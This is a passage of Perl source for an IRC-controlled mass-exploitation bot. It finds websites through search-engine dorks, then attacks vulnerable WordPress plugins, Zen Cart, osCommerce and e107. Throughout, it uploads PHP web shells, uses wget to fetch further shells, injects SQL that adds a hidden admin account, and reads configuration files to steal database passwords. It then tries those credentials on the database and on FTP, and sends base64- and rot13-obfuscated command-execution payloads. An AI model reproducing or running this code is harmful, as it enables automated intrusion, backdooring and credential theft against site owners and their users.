  970.         if ($gps2 ==1) {
  971.         if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } exit; } }
  972.         if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type); } exit; } }
  973.         if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } }
  974.         if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } }
  975.         if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit; } }
  976.         if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit; } }
  977.         if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } exit; } }
  978.         if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } }
  979.         if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } exit; } }
  980.         if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit; } }
  981.         if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } }
  982.         if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } }
  983.         if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } }
  984.         }
  985. }
  986.  
  987.  
  988. ###### EXPLOITING #######
  989. sub rfg_exploit() {
  990.         my $chan = $_[0];
  991.         my $bugz = $_[1];
  992.         my $simpan = $_[2];
  993.         my $dork = $_[3];
  994.         my $engine = $_[4];
  995.         my $count = 0;
  996.         my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo);
  997.         my $num = scalar(@totexploit);
  998.         if ($num > 0){
  999.                 foreach my $site(@totexploit){
  1000.                 $count++;
  1001.                 if ($count == $num-1) { &msg("$chan","$rfglogo15$engine 9Finished 15for 9$dork "); }
  1002.                         my $aplod = LWP::UserAgent->new;
  1003.                         my $res = $aplod->post("http://".$site.$bugz,['file[]' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1004.                         my $hasil = $res->content;
  1005.                         my $vpath = "wp-content/plugins/radykal-fancy-gallery/admin/";
  1006. #                       my $test  = "http://garguritos.com/rfg.php?url=http://".$site;
  1007.                         if ($hasil=~ /\"realFile\":\"(.*)php\"/){
  1008.                                         &msg("$chan","$rfglogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
  1009.                                 my $prikitiw = $1;
  1010.                                 my $test = "http://".$site.$vpath.$prikitiw."php";
  1011.                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1012.                                         my $cekap = &get_content($test);
  1013.                                         if ($cekap =~ /UnKnown - Simple Shell/) {
  1014.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1015.                                                 if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  1016.                                                 if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  1017.                                                 if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
  1018.                                                 &msg("$chan","$rfglogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1019.                                                 &msg("$admin","$rfglogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1020.                                         my $cupl = $test."?cmd=wget";
  1021.                                         my $crut = &get_content($cupl);
  1022.                                         if ($crut =~ /missing/i) {
  1023.                                         my $upload = $cupl.'%20'.$thumbshell.'%20-O%20bad.php';&get_content($upload);sleep(1);
  1024.                                         my $shell = "http://".$site.$vpath."bad.php";
  1025.                                         my $check = &get_content($shell);
  1026.                                         if ($check =~ /stunshell/i){
  1027.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1028.                                                 if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
  1029.                                                 if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  1030.                                                 if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
  1031.                                                 &msg("$admin","$rfglogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1032.                                                 &msg("$chan","$rfglogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1033.                                         }
  1034.                                         }
  1035.                                 }
  1036.                         } exit; } }
  1037.                 }
  1038.         }
  1039. }
  1040.  
  1041.  
  1042. sub mmfc_exploit() {
  1043.         my $chan = $_[0];
  1044.         my $bugz = $_[1];
  1045.         my $simpan = $_[2];
  1046.         my $dork = $_[3];
  1047.         my $engine = $_[4];
  1048.         my $count = 0;
  1049.         my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$mmfclogo);
  1050.         my $num = scalar(@totexploit);
  1051.         if ($num > 0){
  1052.                 foreach my $site(@totexploit){
  1053.                 $count++;
  1054.                 if ($count == $num-1) { &msg("$chan","$mmfclogo15$engine 9Finished 15for 9$dork "); }
  1055.                         my $aplod = LWP::UserAgent->new;
  1056.                         my $res = $aplod->post("http://".$site.$bugz,['fileToUpload' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1057.                         my $hasil = $res->content;
  1058.                         my $vpath = "wp-content/plugins/mm-forms-community/upload/temp/";
  1059.                         if ($hasil=~ /has been successfully uploaded/){
  1060.                         my $filexxx = "";
  1061.                         if ($hasil=~ /filename: \'(.*)php/){$filexxx = $1;}
  1062.                                         &msg("$chan","$mmfclogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
  1063.                                 my $test = "http://".$site.$vpath.$filexxx."php";
  1064.                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1065.                                         my $cekap = &get_content($test);
  1066.                                         if ($cekap =~ /UnKnown - Simple Shell/) {
  1067.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1068.                                                 if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  1069.                                                 if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  1070.                                                 if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
  1071.                                                 &msg("$chan","$mmfclogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1072.                                                 &msg("$admin","$mmfclogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1073.                                         my $cupl = $test."?cmd=wget";
  1074.                                         my $crut = &get_content($cupl);
  1075.                                         if ($crut =~ /missing/i) {
  1076.                                         my $upload = $cupl.'%20'.$thumbshell.'%20-O%20bad.php';&get_content($upload);sleep(1);
  1077.                                         my $shell = "http://".$site.$vpath."bad.php";
  1078.                                         my $check = &get_content($shell);
  1079.                                         if ($check =~ /stunshell/i){
  1080.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1081.                                                 if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
  1082.                                                 if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  1083.                                                 if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
  1084.                                                 &msg("$admin","$mmfclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1085.                                                 &msg("$chan","$mmfclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1086.                                         }
  1087.                                         }
  1088.                                 }
  1089.                         } exit; } }
  1090.                 }
  1091.         }
  1092. }
  1093. sub avm_exploit() {
  1094.         my $chan = $_[0];
  1095.         my $bugz = $_[1];
  1096.         my $simpan = $_[2];
  1097.         my $dork = $_[3];
  1098.         my $engine = $_[4];
  1099.         my $count = 0;
  1100.         my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$avmlogo);
  1101.         my $num = scalar(@totexploit);
  1102.         if ($num > 0){
  1103.                 foreach my $site(@totexploit){
  1104.                 $count++;
  1105.                 if ($count == $num-1) { &msg("$chan","$avmlogo15$engine 9Finished 15for 9$dork "); }
  1106.                         my $aplod = LWP::UserAgent->new;
  1107.                         my $res = $aplod->post("http://".$site.$bugz,['Filedata' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1108.                         my $hasil = $res->content;
  1109.                         my $vpath = "wp-content/videoaudio/temp/";
  1110.                         if ($hasil=~ /\"filename\":\"xxx.php\"/){
  1111.                                 &msg("$chan","$avmlogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
  1112.                                 my $test = "http://".$site.$vpath."xxx.php";
  1113.                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1114.                                         my $cekap = &get_content($test);
  1115.                                         if ($cekap =~ /UnKnown - Simple Shell/) {
  1116.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1117.                                                 if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  1118.                                                 if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  1119.                                                 if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
  1120.                                                 &msg("$chan","$avmlogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1121.                                                 &msg("$admin","$avmlogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1122.                                         my $cupl = $test."?cmd=wget";
  1123.                                         my $crut = &get_content($cupl);
  1124.                                         if ($crut =~ /missing/i) {
  1125.                                         my $upload = $cupl.'%20'.$thumbshell.'%20-O%20bad.php';&get_content($upload);sleep(1);
  1126.                                         my $shell = "http://".$site.$vpath."bad.php";
  1127.                                         my $check = &get_content($shell);
  1128.                                         if ($check =~ /stunshell/i){
  1129.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1130.                                                 if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
  1131.                                                 if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  1132.                                                 if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
  1133.                                                 &msg("$admin","$avmlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1134.                                                 &msg("$chan","$avmlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1135.                                         }
  1136.                                         }
  1137.                                 }
  1138.                         } exit; } }
  1139.                 }
  1140.         }
  1141. }
  1142.  
  1143. sub zen_exploit() {
  1144.         my $chan = $_[0];
  1145.         my $bug = $_[1];
  1146.         my $simpan = $_[2];
  1147.         my $dork = $_[3];
  1148.         my $engine = $_[4];
  1149.         my $count = 0;
  1150.         my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
  1151.         my $num = scalar(@totexploit);
  1152.         if ($num > 0){
  1153.                 foreach my $site(@totexploit){
  1154.                 $count++;
  1155.                 if ($count == $num-1) { &msg("$chan","$zenlogo15$engine 9Finished 15for 9$dork "); }
  1156.                         my $test  = "http://".$site.$bug;
  1157.                                 my $html  = &get_content($test);
  1158.                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1159.                                 if ($html =~ /zc_install/){
  1160.                                         &zen_query($chan,$site,$test,$engine);
  1161.                                 }
  1162.                         } exit; }
  1163.                 }
  1164.         }
  1165. }
  1166.  
  1167. sub zen_query() {
  1168.         my $chan = $_[0];
  1169.         my $url = $_[1];
  1170.         my $test = $_[2];
  1171.         my $engine = $_[3];
  1172.         my $code  = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B";
  1173.         my $req = HTTP::Request->new(POST => $test);
  1174.         $req->content_type("application/x-www-form-urlencoded");
  1175.         $req->content("query_string=".$code);
  1176.         my $ua = LWP::UserAgent->new(agent => $uagent);
  1177.         $ua->timeout(3);
  1178.         my $res = $ua->request($req);
  1179.         my $data = $res->as_string;
  1180.         if ( $data =~ /1 statements processed/i ) {
  1181.                 &msg("$chan","$zenlogo15$engine 4<9=4>15 VulN 4<9=4>9 http://".$url."admin/login.php ");
  1182.                 &msg("$admin","$zenlogo15$engine 4<9=4>15 VulN 4<9=4>9 http://".$url."admin/login.php ");
  1183.         }
  1184.         elsif ( $data =~ /Duplicate entry/i ) {
  1185.                 &msg("$chan","$zenlogo15$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php )");
  1186.                 &msg("$admin","$zenlogo15$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php ");
  1187.         }
  1188. }
  1189.  
  1190. sub osco_exploit() {
  1191.         my $chan = $_[0];
  1192.         my $bug = $_[1];
  1193.         my $simpan = $_[2];
  1194.         my $dork = $_[3];
  1195.         my $engine = $_[4];
  1196.         my $count = 0;
  1197.         my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  1198.         my $num = scalar(@totexploit);
  1199.         if ($num > 0){
  1200.                 foreach my $site(@totexploit){
  1201.                 $count++;
  1202.                 if ($count == $num-1) { &msg("$chan","$oscologo15$engine 9Finished 15for 9$dork "); }
  1203.                         my $cat = "http://".$site."admin/categories.php/login.php";
  1204.                         my $fm = "http://".$site."admin/file_manager.php/login.php";
  1205.                         my $bm = "http://".$site."admin/banner_manager.php/login.php";
  1206.                         my $shell = "http://".$site."images/lobex.php";
  1207.                         my $dumper = "http://".$site."images/lobexdb.php";
  1208.                                 my $coba = &get_content($cat);
  1209.                                 my $cob2 = &get_content($fm);
  1210.                                 my $cob3 = &get_content($bm);
  1211.                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1212.                                 if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) {
  1213.                                         my $test = $cat."?action=download&filename=/includes/configure.php";
  1214.                                         my $cek = &get_content($test);
  1215.                                         if ($cek =~ /http:\/\//) {
  1216.                                                 &osql_xpl($test,$chan,$site,$engine);
  1217.                                         }
  1218.                                         my $aplod = LWP::UserAgent->new;
  1219.                                         my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string;
  1220.                                         my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string;
  1221.                                         my $cekap = &get_content($shell);
  1222.                                         if ($cekap =~ /UnKnown - Simple Shell/) {
  1223.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1224.                                                 if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  1225.                                                 if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  1226.                                                 if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
  1227.                                                 &msg("$chan","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1228.                                                 &msg("$admin","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1229.                                                 &msg("$chan","$oscologo15$engine 4<9=4>9 Dumper 4<9=4>9 $dumper ");sleep(1);
  1230.                                         }
  1231.                                 }
  1232.                                 if ($cob2 =~ /TABLE_HEADING_FILENAME/i) {
  1233.                                         my $test2 = $fm."?action=download&filename=/includes/configure.php";
  1234.                                         my $cek2 = &get_content($test2);
  1235.                                         if ($cek2 =~ /http:\/\//) {
  1236.                                                 &osql_xpl($test2,$chan,$site,$engine);
  1237.                                         }
  1238.                                         my $aplod2 = LWP::UserAgent->new;
  1239.                                         my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string;
  1240.                                         my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string;
  1241.                                         my $cekap = &get_content($shell);
  1242.                                         if ($cekap =~ /UnKnown - Simple Shell/) {
  1243.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1244.                                                 if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  1245.                                                 if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  1246.                                                 if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
  1247.                                                 &msg("$chan","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1248.                                                 &msg("$admin","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1249.                                                 &msg("$chan","$oscologo15$engine 4<9=4>9 Dumper 4<9=4>9 $dumper ");sleep(1);
  1250.                                         }
  1251.                                 }
  1252.                                 if ($cob3 =~ /TABLE_HEADING_BANNERS/i) {
  1253.                                         my $test3 = $bm."?action=download&filename=/includes/configure.php";
  1254.                                         my $cek3 = &get_content($test3);
  1255.                                         if ($cek3 =~ /http:\/\//) {
  1256.                                                 &osql_xpl($test3,$chan,$site,$engine);
  1257.                                         }
  1258.                                         my $aplod3 = LWP::UserAgent->new;
  1259.                                         my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string;
  1260.                                         my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string;
  1261.                                         my $cekap = &get_content($shell);
  1262.                                         if ($cekap =~ /UnKnown - Simple Shell/) {
  1263.                                                 my $safe = ""; my $os = ""; my $uid = "";
  1264.                                                 if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  1265.                                                 if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  1266.                                                 if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
  1267.                                                 &msg("$chan","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1268.                                                 &msg("$admin","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
  1269.                                                 &msg("$chan","$oscologo15$engine 4<9=4>9 Dumper 4<9=4>9 $dumper ");sleep(1);
  1270.                                         }
  1271.                                 }
  1272.                                 } exit;
  1273.                         }
  1274.                 }
  1275.         }
  1276.  
  1277.  
  1278. sub osql_xpl() {
  1279.         my $url    = $_[0];
  1280.         my $chan   = $_[1];
  1281.         my $site   = $_[2];
  1282.         my $engine = $_[3];
  1283.         my $request = HTTP::Request->new(GET=>$url);
  1284.         my $browser = LWP::UserAgent->new();
  1285.         $browser->timeout(10);
  1286.         my $response = $browser->request($request);
  1287.         my @dbsinfo;
  1288.         if ($response->is_success) {
  1289.                 my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = "";
  1290.                 my $res = $response->as_string;
  1291.                 if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
  1292.                         $dpath = $1;
  1293.                         &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DIR path: 4 $dpath");
  1294.                 }
  1295.                 if ($res =~ m/'DB_SERVER', '(.*)'/g) {
  1296.                         $dbserver = $1;
  1297.                         &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB Server: 4 $dbserver");
  1298.                 }
  1299.                 if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
  1300.                         $dbuser = $1;
  1301.                         &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB username: 4 $dbuser");
  1302.                 }
  1303.                 if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
  1304.                         $dbpass = $1;
  1305.                         &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB password: 4 $dbpass");
  1306.                 }
  1307.                 if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
  1308.                         $dbname = $1;
  1309.                         &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB database: 4 $dbname");
  1310.                 }
  1311.                 my $hosts = "http://".$site;
  1312.                 if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
  1313.                         $host = $2;
  1314.                         &dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine,$oscologo);sleep(1);
  1315.                         if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; }
  1316.                         &ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$oscologo);sleep(1);
  1317.                 }
  1318.         }
  1319. }
  1320.  
  1321. sub e107_exploit() {
  1322.         my $chan = $_[0];
  1323.         my $bug = $_[1];
  1324.         my $simpan = $_[2];
  1325.         my $dork = $_[3];
  1326.         my $engine = $_[4];
  1327.         my $count = 0;
  1328.         my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo);
  1329.         my $num = scalar(@totexploit);
  1330.         if ($num > 0){
  1331.                 foreach my $site(@totexploit){
  1332.                 $count++;
  1333.                 if ($count == $num-1) { &msg("$chan","$e107logo15$engine 9Finished 15for 9$dork "); }
  1334.                         my $test = "http://".$site.$bug;
  1335.                         my $shellz = "http://".$site."/images/lobex.php";
  1336.                         my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1337.                         my $html = &e107_rce_query($test,$code);
  1338.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1339.                         if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
  1340.                                 &msg("$chan","$e107logo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
  1341.                                 my $sys = $1;
  1342.                                 my $upload = "";
  1343.                                 my $res = &e107_rce_query($test);
  1344.                                 if ($res =~ /lobexxx/) {
  1345.                                         my $check = &get_content($shellz);
  1346.                                         if ($check =~ /UnKnown - Simple Shell/) {
  1347.                                                 &msg("$chan","$e107logo15$engine 4<9=4>9 SheLL 4<9=4>9 $shellz ");sleep(2);
  1348.                                         }
  1349.                                 } else { &msg("$chan","$e107logo15$engine 4<9=4>15 System 4<9=4>9 $test 15($sys) ");sleep(2); }
  1350.                         }
  1351.                 } exit; }
  1352.                 }
  1353.         }
  1354. }
  1355.  
  1356. sub e107_rce_query() {
  1357.     my $url = $_[0];
  1358.     my $code = encode_base64('echo "lobexxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWV